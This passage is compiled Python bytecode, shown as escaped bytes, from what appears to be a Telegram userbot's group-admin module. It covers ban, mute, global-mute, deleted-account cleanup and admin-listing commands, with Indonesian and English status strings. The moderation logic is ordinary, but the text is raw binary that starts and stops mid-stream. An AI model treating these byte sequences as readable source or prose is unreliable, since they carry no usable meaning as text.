Nz\r`Demoting...`Z\x06admemer\x01\x00\x00\x00rC\x00\x00\x00z\x17`Demoted Successfully!`z\x0f#DEMOTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r\x14\x00\x00\x00r6\x00\x00\x00r\x0e\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00r\x07\x00\x00\x00rM\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x04dmodr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rR\x00\x00\x00rQ\x00\x00\x00Z\tnewrightsr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06demote\xa8\x00\x00\x00sB\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x02\x08\x01\x10\x01\x04\x03\x10\x01\x04\x01\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x03\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x07\x02\x01\x04\x01\x10\xff\x0e\x05\x0e\x01\x10\x01\x08\x01\x10\x03\x06\x01\x06\x01\x02\x00&\xffrT\x00\x00\x00z\x10^.ban(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x80\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x04}\x05|\x04rNn\x04d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00z |\x00\xa0\x06t\x07|\x00j\x08|\x04j\tt\n\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xa8\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00z$|\x00\xa0\r\xa1\x00I\x00d\x01H\x00}\x06|\x06r\xcc|\x06\xa0\x0e\xa1\x00I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xf4\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x03\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x05\x90\x01r 
|\x00\xa0\x03d\x04t\x0f|\x04j\t\x83\x01\x9b\x00d\x05|\x05\x9b\x00\x9d\x04\xa1\x01I\x00d\x01H\x00\x01\x00n\x1e|\x00\xa0\x03d\x04t\x0f|\x04j\t\x83\x01\x9b\x00d\x06\x9d\x03\xa1\x01I\x00d\x01H\x00\x01\x00t\x10\x90\x01r||\x00j\x06\xa0\x11t\x12d\x07|\x04j\x13\x9b\x00d\x08|\x04j\t\x9b\x00d\t|\x00j\x14j\x15\x9b\x00d\n|\x00j\x08\x9b\x00d\x0b\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0cz2 For .ban command, bans the replied/tagged person Nz\x14`Whacking the pest!`z=`I dont have message nuking rights! But still he was banned!`\xfa\x01`z\x18` Tergamparr !!\nReason: z\x18` Berhasil di Gamparr !!z\x0c#BAN\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x16r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00\xda\rBANNED_RIGHTSr\x07\x00\x00\x00rM\x00\x00\x00r/\x00\x00\x00\xda\x06delete\xda\x03strr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x03bonr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00\xda\x06reason\xda\x05replyr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x03ban\xd9\x00\x00\x00sF\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x02\x02\x04\x03\x10\x02\x02\x01\x0e\x01\x02\xff\x10\x02\x0e\x01\x10\x01\x08\x02\x02\x01\x0e\x01\x04\x01\x12\x01\x0e\x01\x04\x01\x02\xff\n\x02\x08\x04\x06\x01$\x02\x1e\x03\x06\x01\x06\x01\x02\x00&\xffr[\x00\x00\x00z\x12^.unban(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\xfc\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00t\x05|\x00\x83\x01I\x00d\x01H\x00}\x04|\x04d\x03\x19\x00}\x04|\x04rbn\x04d\x01S\x00zl|\x00\xa0\x06t\x07|\x00j\x08|\x04j\tt\n\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00t\x0br\xd0|\x00j\x06\xa0\x0ct\rd\x05|\x04j\x0e\x9b\x00d\x06|\x04j\t\x9b\x00d\x07|\x00j\x0fj\x10\x9b\x00d\x08|\x00j\x08\x9b\x00d\t\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00W\x00n$\x04\x00t\x11k\nr\xf6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\n\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x0bz6 For .unban command, unbans the replied/tagged person Nz\x0e`Unbanning...`r\x01\x00\x00\x00z\x1b```Unbanned Successfully```z\x0e#UNBAN\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00z\x1d`Uh oh my unban logic broke!`)\x12r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00\xda\x0cUNBAN_RIGHTSr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r\x0c\x00\x00\x00)\x05Z\x05unbonr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x08nothanos\x0e\x01\x00\x00s0\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x10\x02\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x02\x02\x01\x04\x01\x0e\xff\n\x02\x10\x02\x04\x01\x06\x01\x02\x00&\xff\x0e\x04\x0e\x01r]\x00\x00\x00z\x11^.mute(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\xa4\x01\x00\x00z\x10d\x01d\x02l\x00m\x01}\x01\x01\x00W\x00n&\x04\x00t\x02k\nr6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x04\xa1\x01I\x00d\x03H\x00\x01\x00Y\x00d\x03S\x00X\x00|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x02|\x02j\x06}\x03|\x02j\x07}\x04|\x03sn|\x04sn|\x00\xa0\x03t\x08\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00t\t|\x00\x83\x01I\x00d\x03H\x00\\\x02}\x05}\x06|\x05r\x86n\x04d\x03S\x00|\x00j\n\xa0\x0b\xa1\x00I\x00d\x03H\x00}\x07|\x05j\x0c|\x07j\x0ck\x02r\xba|\x00\xa0\x03d\x04\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00\xa0\x03d\x05\xa1\x01I\x00d\x03H\x00\x01\x00|\x01|\x00j\r|\x05j\x0c\x83\x02d\x06k\x08r\xec|\x00\xa0\x03d\x07\xa1\x01I\x00d\x03H\x00S\x00z\x8c|\x00\xa0\nt\x0e|\x00j\r|\x05j\x0ct\x0f\x83\x03\xa1\x01I\x00d\x03H\x00\x01\x00|\x06\x90\x01r(|\x00\xa0\x03d\x08|\x06\x9b\x00\x9d\x02\xa1\x01I\x00d\x03H\x00\x01\x00n\x10|\x00\xa0\x03d\t\xa1\x01I\x00d\x03H\x00\x01\x00t\x10\x90\x01rv|\x00j\n\xa0\x11t\x12d\n|\x05j\x13\x9b\x00d\x0b|\x05j\x0c\x9b\x00d\x0c|\x00j\x14j\x15\x9b\x00d\r|\x00j\r\x9b\x00d\x0e\x9d\t\xa1\x02I\x00d\x03H\x00\x01\x00W\x00n&\x04\x00t\x16k\n\x90\x01r\x9e\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x0f\xa1\x01I\x00d\x03H\x00\x06\x00Y\x00S\x00X\x00d\x03S\x00)\x10z1\n This function is basically muting peeps\n r\x01\x00\x00\x00)\x01\xda\x04muteNuE\x00\x00\x00`Hands too short, can\'t duct tape myself...\n(\xe3\x83\x98\xef\xbd\xa5_\xef\xbd\xa5)\xe3\x83\x98\xe2\x94\xb3\xe2\x94\x81\xe2\x94\xb3`z\x0e`Gets a tape!`Fz%`Error! 
User probably already muted.`z\x1f`Berhasil di Emute !!`\nReason: z\x16`Berhasil di Emute !!`z\r#MUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00z\x1c`Uh oh my mute logic broke!`)\x17\xda(userbot.modules.sql_helper.spam_mute_sqlr^\x00\x00\x00\xda\x0eAttributeErrorr.\x00\x00\x00\xda\x06NO_SQLr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00Z\x06get_merL\x00\x00\x00r:\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bMUTE_RIGHTSr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r\x0c\x00\x00\x00)\x08Z\x04spdrr^\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00Z\tself_userr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06spider3\x01\x00\x00sL\x00\x00\x00\x00\x06\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x03\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x02\x02\x04\x02\x10\x02\x0c\x01\x04\x01\x02\xff\n\x02\x04\x03\x10\x01\x12\x01\x10\x02\x02\x01\x04\x01\x0e\xff\n\x04\x06\x01\x18\x02\x10\x03\x06\x01\x06\x01\x02\x00&\xff\x0e\x04\x10\x01rc\x00\x00\x00z\x13^.unmute(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\\\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00t\t|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x02\x19\x00}\x05|\x05r\x9an\x04d\x01S\x00|\x04|\x00j\n|\x05j\x0b\x83\x02d\x05k\x08r\xc0|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00S\x00z0|\x00\xa0\x0ct\r|\x00j\n|\x05j\x0bt\x0e\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n(\x04\x00t\x0fk\n\x90\x01r\x18\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\x10\x90\x01rX|\x00j\x0c\xa0\x11t\x12d\t|\x05j\x13\x9b\x00d\n|\x05j\x0b\x9b\x00d\x0b|\x00j\x14j\x15\x9b\x00d\x0c|\x00j\n\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ez7 For .unmute command, unmute the replied/tagged person Nr\x01\x00\x00\x00)\x01\xda\x06unmutez\x11```Unmuting...```Fz\'`Error! 
User probably already unmuted.`z\x1a```Unmuted Successfully```z\x1e`Uh oh my unmute logic broke!`z\x0f#UNMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x16r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00r_\x00\x00\x00rd\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r\\\x00\x00\x00r\x0c\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x06Z\x05unmotr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rd\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06unmooto\x01\x00\x00s@\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x03\x10\x01\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x02\x12\x01\x10\x03\x02\x01\x04\x01\x0e\xff\n\x02\x14\x01\x10\x01\x10\x01\x08\x02\x06\x01\x06\x01\x02\x00&\xffre\x00\x00\x00)\x01Z\x08incomingc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xd8\x00\x00\x00z\x1cd\x01d\x02l\x00m\x01}\x01\x01\x00d\x01d\x03l\x02m\x03}\x02\x01\x00W\x00n\x16\x04\x00t\x04k\nr2\x01\x00\x01\x00\x01\x00Y\x00d\x04S\x00X\x00|\x01|\x00j\x05\x83\x01}\x03|\x02|\x00j\x06\x83\x01}\x04t\x07d\x04d\x05d\x05d\x05d\x05d\x05d\x05d\x05d\x06\x8d\x08}\x05|\x03r\xac|\x03D\x00]B}\x06t\x08|\x06j\t\x83\x01t\x08|\x00j\x06\x83\x01k\x02rh|\x00\xa0\n\xa1\x00I\x00d\x04H\x00\x01\x00|\x00\xa0\x0bt\x0c|\x00j\x05|\x00j\x06|\x05\x83\x03\xa1\x01I\x00d\x04H\x00\x01\x00qh|\x04D\x00]"}\x06|\x06j\tt\x08|\x00j\x06\x83\x01k\x02r\xb0|\x00\xa0\n\xa1\x00I\x00d\x04H\x00\x01\x00q\xb0d\x04S\x00)\x07z0 Used for deleting the messages of muted people 
r\x01\x00\x00\x00)\x01\xda\x08is_muted)\x01\xda\tis_gmutedNTr)\x00\x00\x00)\rr_\x00\x00\x00rf\x00\x00\x00\xda$userbot.modules.sql_helper.gmute_sqlrg\x00\x00\x00r`\x00\x00\x00r:\x00\x00\x00Z\tsender_idr\x15\x00\x00\x00rX\x00\x00\x00Z\x06senderrW\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00)\x07Z\x04mootrf\x00\x00\x00rg\x00\x00\x00Z\x05mutedZ\x06gmutedZ\x06rights\xda\x01ir@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05muter\x9f\x01\x00\x00s6\x00\x00\x00\x00\x03\x02\x01\x0c\x01\x10\x01\x0e\x01\x08\x01\n\x01\n\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x06\n\x04\x01\x08\x01\x14\x01\x0e\x01\x04\x01\x0e\xff\x0c\x02\x08\x01\x10\x01rj\x00\x00\x00z\x14^.ungmute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x10\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\t|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x02\x19\x00}\x05|\x05r\x8an\x04d\x01S\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x04|\x05j\n\x83\x01d\x05k\x08r\xbe|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00nN|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00t\x0b\x90\x01r\x0c|\x00j\x0c\xa0\rt\x0ed\x08|\x05j\x0f\x9b\x00d\t|\x05j\n\x9b\x00d\n|\x00j\x10j\x11\x9b\x00d\x0b|\x00j\x12\x9b\x00d\x0c\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rz: For .ungmute command, ungmutes the target in the userbot Nr\x01\x00\x00\x00)\x01\xda\x07ungmutez\x12```Ungmuting...```Fz"`Error! 
User probably not gmuted.`z\x1b```Ungmuted Successfully```z\x10#UNGMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rh\x00\x00\x00rk\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00rL\x00\x00\x00r\x19\x00\x00\x00r6\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x06Z\x08un_gmuter>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rk\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07ungmoot\xbe\x01\x00\x00s2\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x02\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x03\x10\x02\x0e\x01\x12\x03\x10\x02\x06\x01\x06\x01\x02\x00&\xffrl\x00\x00\x00z\x12^.gmute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s(\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\t|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x05}\x06|\x05r\x86n\x04d\x01S\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x04|\x05j\n\x83\x01d\x05k\x08r\xba|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00nj|\x06r\xd6|\x00\xa0\x03d\x07|\x06\x9b\x00\x9d\x02\xa1\x01I\x00d\x01H\x00\x01\x00n\x10|\x00\xa0\x03d\x08\xa1\x01I\x00d\x01H\x00\x01\x00t\x0b\x90\x01r$|\x00j\x0c\xa0\rt\x0ed\t|\x05j\x0f\x9b\x00d\n|\x05j\n\x9b\x00d\x0b|\x00j\x10j\x11\x9b\x00d\x0c|\x00j\x12\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ez> For .gmute command, globally mutes the replied/tagged person Nr\x01\x00\x00\x00)\x01\xda\x05gmutez\x13`Prosses Ngemute..`Fz9`Error! 
User probably already gmuted.\nRe-rolls the tape.`z\x1f`Berhasil di G Emute!!`Reason: z\x17`Berhasil di G Emute!!`z\x0e#GMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rh\x00\x00\x00rm\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00rL\x00\x00\x00r\x19\x00\x00\x00r6\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x07Z\x05gspdrr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rm\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07gspider\xe9\x01\x00\x00s8\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x02\x12\x01\x04\x01\x02\x02\x04\x03\x10\x01\x0e\x01\x04\x01\x02\xff\x0c\x03\x04\x01\x18\x02\x10\x02\x06\x01\x06\x01\x02\x00&\xffrn\x00\x00\x00z\x14^.zombies(?: |$)(.*))\x03r*\x00\x00\x00r+\x00\x00\x00Z\x0bgroups_onlyc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s.\x02\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01d\x02}\x02d\x03}\x03|\x01d\x04k\x03r\x92|\x00\xa0\x03d\x05\xa1\x01I\x00d\x06H\x00\x01\x00|\x00j\x04\xa0\x05|\x00j\x06\xa1\x012\x00z(3\x00d\x06H\x00W\x00}\x04|\x04j\x07r>|\x02d\x017\x00}\x02t\x08d\x01\x83\x01I\x00d\x06H\x00\x01\x00q>6\x00|\x02d\x02k\x04r~d\x07|\x02\x9b\x00d\x08\x9d\x03}\x03|\x00\xa0\x03|\x03\xa1\x01I\x00d\x06H\x00\x01\x00d\x06S\x00|\x00\xa0\t\xa1\x00I\x00d\x06H\x00}\x05|\x05j\n}\x06|\x05j\x0b}\x07|\x06s\xc8|\x07s\xc8|\x00\xa0\x03d\t\xa1\x01I\x00d\x06H\x00\x01\x00d\x06S\x00|\x00\xa0\x03d\n\xa1\x01I\x00d\x06H\x00\x01\x00d\x02}\x02d\x02}\x08|\x00j\x04\xa0\x05|\x00j\x06\xa1\x012\x00z\xa63\x00d\x06H\x00W\x00}\x04|\x04j\x07r\xeez 
|\x00\xa0\x04t\x0c|\x00j\x06|\x04j\rt\x0e\x83\x03\xa1\x01I\x00d\x06H\x00\x01\x00W\x00nN\x04\x00t\x0fk\n\x90\x01rJ\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x0b\xa1\x01I\x00d\x06H\x00\x01\x00Y\x00\x01\x00d\x06S\x00\x04\x00t\x10k\n\x90\x01rn\x01\x00\x01\x00\x01\x00|\x02d\x018\x00}\x02|\x08d\x017\x00}\x08Y\x00n\x02X\x00|\x00\xa0\x04t\x0c|\x00j\x06|\x04j\rt\x11\x83\x03\xa1\x01I\x00d\x06H\x00\x01\x00|\x02d\x017\x00}\x02q\xee6\x00|\x02d\x02k\x04\x90\x01r\xaed\x0c|\x02\x9b\x00d\r\x9d\x03}\x03|\x08d\x02k\x04\x90\x01r\xcad\x0c|\x02\x9b\x00d\x0e|\x08\x9b\x00d\x0f\x9d\x05}\x03|\x00\xa0\x03|\x03\xa1\x01I\x00d\x06H\x00\x01\x00t\x08d\x10\x83\x01I\x00d\x06H\x00\x01\x00|\x00\xa0\x12\xa1\x00I\x00d\x06H\x00\x01\x00t\x13\x90\x02r*|\x00j\x04\xa0\x14t\x15d\x11|\x02\x9b\x00d\x12|\x00j\x16j\x17\x9b\x00d\x13|\x00j\x06\x9b\x00d\x14\x9d\x07\xa1\x02I\x00d\x06H\x00\x01\x00d\x06S\x00)\x15zM For .zombies command, list all the ghost/deleted/zombie accounts in a chat. \xe9\x01\x00\x00\x00r\x01\x00\x00\x00z+`No deleted accounts found, Group is clean`Z\x05cleanz0`Searching for ghost/deleted/zombie accounts...`Nz\n`Found` **zb** `ghost/deleted/zombie account(s) in this group, \nclean them by using .zombies clean`z\x19`I am not an admin here!`z3`Deleting deleted accounts...\nOh I can do that?!?!`z\'`I don\'t have ban rights in this group`z\nCleaned **z\x15** deleted account(s)z!** deleted account(s) \n**z)** deleted admin accounts are not removed\xe9\x02\x00\x00\x00z\x13#CLEANUP\nCleaned **z+** deleted account(s) !! 
\nCHAT: rI\x00\x00\x00rJ\x00\x00\x00)\x18\xda\rpattern_match\xda\x05group\xda\x05lowerr.\x00\x00\x00r6\x00\x00\x00\xda\x11iter_participantsr:\x00\x00\x00\xda\x07deletedr\x02\x00\x00\x00r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r\x0f\x00\x00\x00rL\x00\x00\x00rV\x00\x00\x00r\x08\x00\x00\x00r\x0b\x00\x00\x00r\\\x00\x00\x00rW\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\t\xda\x04showZ\x03conZ\x05del_uZ\ndel_statusrQ\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x05del_ar@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\rrm_deletedacc\x15\x02\x00\x00sh\x00\x00\x00\x00\x04\x10\x01\x04\x01\x04\x02\x08\x01\x10\x01\x1a\x02\x06\x01\x08\x01\x12\x01\x08\x01\x0c\x02\x10\x01\x04\x03\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x10\x01\x04\x01\x04\x02\x1a\x01\x06\x01\x02\x01\x04\x01\x0e\xff\x0e\x02\x10\x01\x10\x01\x08\x01\x10\x01\x08\x01\x0e\x01\x04\x01\x0e\xff\n\x02\x0c\x03\n\x01\x0c\x02\n\x01\x08\x01\x02\xff\x08\x04\x10\x01\x0e\x01\x0e\x03\x06\x01\x06\x01\x02\x00\x1c\xffrw\x00\x00\x00z\t^.admins$c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xf8\x00\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r |\x01j\x03n\x02d\x02}\x02d\x03|\x02\x9b\x00d\x04\x9d\x03}\x03zx|\x00j\x00j\x04|\x00j\x02t\x05d\x05\x8d\x022\x00z^3\x00d\x01H\x00W\x00}\x04|\x04j\x06s\x90d\x06|\x04j\x07\x9b\x00d\x07|\x04j\x08\x9b\x00d\x08\x9d\x05}\x05d\t|\x04j\x07\x9b\x00d\n\x9d\x03}\x06|\x03d\x0b|\x05\x9b\x00d\x0c|\x06\x9b\x00\x9d\x047\x00}\x03qD|\x03d\r|\x04j\x07\x9b\x00d\n\x9d\x037\x00}\x03qD6\x00W\x00n6\x04\x00t\tk\nr\xde\x01\x00}\x07\x01\x00z\x18|\x03d\x0ct\n|\x07\x83\x01\x17\x00d\x0b\x17\x007\x00}\x03W\x005\x00d\x01}\x07~\x07X\x00Y\x00n\x02X\x00|\x00j\x0b|\x03d\x0ed\x0f\x8d\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x10z: For .admins command, list all of the admins of the chat. 
